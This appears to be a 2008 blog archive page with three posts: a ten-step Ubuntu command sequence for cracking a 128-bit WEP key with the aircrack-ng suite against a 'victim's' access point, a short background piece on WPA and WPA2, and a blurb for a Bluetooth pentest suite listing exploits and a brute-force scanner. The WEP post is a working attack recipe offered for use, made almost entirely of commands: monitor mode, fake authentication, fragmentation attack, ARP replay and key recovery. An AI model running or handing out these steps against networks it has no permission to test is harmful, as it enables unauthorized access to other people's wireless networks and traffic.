Skip to main content

Posts

Showing posts from May 4, 2008

10 Easy Steps to Crack a Wireless WEP Key128 bit using Ubuntu

the Commands 1)sudo airmon-ng start wifi0 (start ur wifi card to monitor mode) 2)sudo wlanconfig ath0 destroy 3)sudo ifconfig ath1 up (makes ur ath1 interface up) 4)sudo iwconfig ath1 mode monitor channel 11 (makes ath1 to set in monitor mode in channel 11) 5)sudo aireplay-ng -1 0 -e linksys -a victims MAC address -h your MAC address ath1 ( Sending Authentication Request) 6)sudo aireplay-ng -5 -b victims MAC address -h your MAC address ath1 (fragmentation attack) 7)packetforge-ng -0 -a victims MAC address -h your MAC address -k 255.255.255.255 -l 255.255.255.255 -y ur xor file.xor -w arp-request (generate an arp packet) 8)sudo airodump-ng -c 11 –bssid victims MAC address -w capture ath1 (monitors the AP) 9)sudo aireplay-ng -2 -r arp-request ath1 (sending the Arp-request with use interactive frame selection) 10)sudo aircrack-ng -z *.cap (capture*.cap selects all dump files starting with “capture” and ending in “cap”.) “-z ptw attack

About WPA and WPA2

Wi-Fi Protected Access (WPA and WPA2) is a class of systems to secure wireless (Wi-Fi) computer networks. It was created in response to several serious weaknesses researchers had found in the previous system, Wired Equivalent Privacy (WEP). WPA implements the majority of the IEEE 802.11i standard, and was intended as an intermediate measure to take the place of WEP while 802.11i was prepared. WPA is specifically designed to also work with pre-WPA wireless network interface cards (through firmware upgrades), but not necessarily with first generation wireless access points. WPA2 implements the full standard, but will not work with some older network cards. WPA2 implements the mandatory elements of 802.11i. In particular, it introduces a new AES-based algorithm, CCMP, that is considered fully secure. From March 13, 2006, WPA2 certification is mandatory for all new devices wishing to be Wi-Fi certified. Security in pre-shared key mode Pre-shared key mode (PSK, also known as personal mode)

Blue|Smash

Blue|Smash is a free open source bluetooth pentest suite, powered by python for linux. Here is a list of some of the tools included. Sorbo's Frontline bluetooth sniffer. A bruteforce scanner Mac address spoofer Load's of exploits Autopwn vunrebility checker CSR Firmware Backup/Updater Version 1.* is only for the backtrack live CD, but verson 2.* will be for most linux distrobutions.